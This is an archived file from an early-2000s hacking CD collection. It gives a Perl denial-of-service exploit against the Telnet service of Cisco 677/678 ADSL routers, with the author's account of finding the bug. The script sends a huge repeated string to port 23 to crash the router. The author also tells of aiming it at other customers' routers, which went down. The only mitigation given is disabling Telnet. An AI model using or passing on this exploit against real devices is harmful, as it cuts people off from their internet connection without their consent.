home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 4 / hacker04 / 04_HACK04.ISO / xploits / cisco / cisco677_pl.txt
Encoding:
Text File  |  2002-05-06  |  2.2 KB  |  62 lines
  1. Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR  
  2. put public on www.deadmeat.dk on 5-5-2002. 
  3. Thanks to all from DKW-stuff for testing.
  4.  
  5. A warm night i was coding and lisen to some tecno music trying to 
  6. overflow my BSD mashine. 
  7. But then I put the wrong IP into my scrip my ADSL router lost the 
  8. Internet connection.
  9. So I start wonder why?  and start looking into the code...
  10. I found out that i have overflowed the telnet server
  11. in my adsl router. After that I got online and start chatting 
  12. with others with same ISP and same Cisco ADSL-router...
  13. and there route died too then i use there IP.
  14. So I send the code to a friend and ask him to do the same...
  15. On every router with the Telnet server open the router's 
  16. ping time got really high
  17. and some of them died and have to be powercycle.
  18. Please note: So fare cisco and the ISP have not done anything 
  19. about this problem...
  20.  
  21. To test it: try with the LAN_IP and WAN_IP  it works best on LAN_IP side ;)
  22. the protection is: close your Telnet server in the router. 
  23. Thats All!  
  24.  
  25. -DNV   Email: dnv[at]dhbit.ca
  26.  
  27. Here is the code:
  28. running: 
  29. perl cisco677.pl -s [IP on Ciscorouter]
  30.  
  31. --------------------cisco677.pl------------------
  32. #!/usr/bin/perl
  33.  
  34. # close your Cisco 677 up on the Telnet server!   
  35. # Made for fun only!  port 23 is the Telnet server port on the router
  36. # By DNV  THX to DKW-stuff
  37. use IO::Socket;
  38. use Getopt::Std;
  39. getopts('s:', \%args);
  40. if(!defined($args{s})){&usage; }
  41. $serv = $args{s};
  42. $foo = "?????????????????a~                %%%%%XX%%%%%"; $number = 30000;
  43. $data .= $foo x $number; $EOL="\015\012";
  44. $remote = IO::Socket::INET->new(
  45.                     Proto       => "tcp",
  46.                     PeerAddr    => $args{s},
  47.                     PeerPort    => "(23)",
  48.                 ) || die("No Telnet server here! on $args{s}\n");
  49. $remote->autoflush(1);
  50. print $remote "$data". $EOL;
  51. while (<$remote>){ print }
  52. print("\nPackets Sent\n");
  53. sub usage {die("\n$0 -s <server>\n\n");}
  54. ------------------------------------------------------
  55.  
  56.  
  57. ------------------------------------------------
  58. This mail sent from DHBiT - http://mail.dhbit.ca
  59.  Come get your free, secure 5MB mailbox today!
  60.  
  61.  
  62.